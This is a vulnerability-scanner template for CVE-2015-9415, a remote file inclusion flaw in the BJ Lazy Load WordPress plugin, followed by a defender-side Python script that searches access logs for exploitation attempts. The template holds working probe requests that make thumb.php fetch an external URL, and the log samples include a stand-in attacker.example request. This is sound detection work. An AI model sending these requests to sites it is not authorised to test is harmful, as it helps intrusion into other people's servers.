Vulnerability description
The BJ Lazy Load plugin v0.7.5 for WordPress has a Remote File Inclusion vulnerability via TimThumb.
id: CVE-2015-9415

info:
  name: BJ Lazy Load (Timthumb) <= 0.7.5 - Remote File Inclusion
  author: s4e-io
  severity: high
  description: |
    The BJ Lazy Load plugin v0.7.5 for WordPress has a Remote File Inclusion vulnerability via TimThumb.
  remediation: Fixed in 1.0
  reference:
    - https://wpscan.com/vulnerability/c15aef94-822d-40eb-80a6-e4a0611cb5c1/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bj-lazy-load/bj-lazy-load-10-remote-file-inclusion-via-timthumb
    - https://nvd.nist.gov/vuln/detail/CVE-2015-9415
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-9415
    cwe-id: CWE-20
    epss-score: 0.19337
    epss-percentile: 0.95118
    cpe: cpe:2.3:a:angrycreative:bj_lazy_load:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: angrycreative
    product: bj_lazy_load
    framework: wordpress
    fofa-query: body="/wp-content/plugins/bj-lazy-load"
  tags: cve,cve2015,wp,wp-plugin,wordpress,wpscan,bj-lazy-load,rfi,vkev,vuln

flow: http(1) || http(2)

http:
  - raw:
      - | # fires only if the ALLOW_ALL_EXTERNAL_SITES option is set to true in bj-lazy-load/inc/timthumb.php
        GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://{{interactsh-url}}/{{rand_base(16)}}.jpg HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains(body, "TimThumb Error")'
          - 'contains(interactsh_protocol, "http")'
        condition: and

  - raw:
      - | # default plugin settings
        GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://img.youtube.com/{{rand_base(16)}}.jpg HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "gd-jpeg")'
          - 'contains(content_type, "image/jpeg")'
        condition: and
# digest: 4a0a00473045022100835e0411e960b97034e80c31e626647b4fc16a371c362533b942910850a4f08f02201be7a8fcd864c3d9c497571fe73350a3cd896175c078e00b5187b56741047125:922c64590222798bb761d5b6d8e72950
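As an added defender-side example (not part of the template above or of the plugin): a log check that flags requests to the plugin's thumb.php whose src parameter is an absolute URL on a foreign host, and records whether the server answered 200 (the file was fetched and served) or 400 (TimThumb refused it), mirroring the two outcomes the template's matchers distinguish. It assumes combined-format web server access logs; the sample lines, IPs and hostnames are constructed.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:10:01:02 +0000] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://attacker.example/x.jpg HTTP/1.1" 400 512 "-" "curl/8.0"
203.0.113.5 - - [10/Mar/2024:10:01:03 +0000] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://img.youtube.com/abcd.jpg HTTP/1.1" 200 9031 "-" "curl/8.0"
198.51.100.7 - - [10/Mar/2024:10:02:00 +0000] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=/wp-content/uploads/2024/03/photo.jpg HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:10:02:01 +0000] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http%3A%2F%2F203.0.113.9%2Fp.jpg HTTP/1.1" 400 512 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2024:10:03:00 +0000] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://www.example.com/wp-content/uploads/b.jpg HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2024:10:03:01 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line (method, target) and response status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
THUMB_PATH = "/wp-content/plugins/bj-lazy-load/thumb.php"


def find_external_thumb_requests(log_text, own_hosts=()):
    """Return one finding per thumb.php request whose src is an absolute URL on a host not in own_hosts."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlparse(m["target"])
        if target.path != THUMB_PATH:
            continue
        src = parse_qs(target.query).get("src", [""])[0]  # parse_qs percent-decodes the value
        src_url = urlparse(src)
        if src_url.scheme not in ("http", "https") or not src_url.hostname:
            continue  # relative/local src is the plugin's normal use
        if src_url.hostname.lower() in own:
            continue  # the site's own host is not a remote inclusion
        findings.append({
            "ip": m["ip"], "time": m["ts"], "remote_host": src_url.hostname,
            "status": int(m["status"]),
            "fetched": m["status"] == "200",  # 200: remote file served; 400: TimThumb refused it
        })
    return findings


if __name__ == "__main__":
    for finding in find_external_thumb_requests(SAMPLE_LOG, own_hosts=("www.example.com",)):
        print(finding)
```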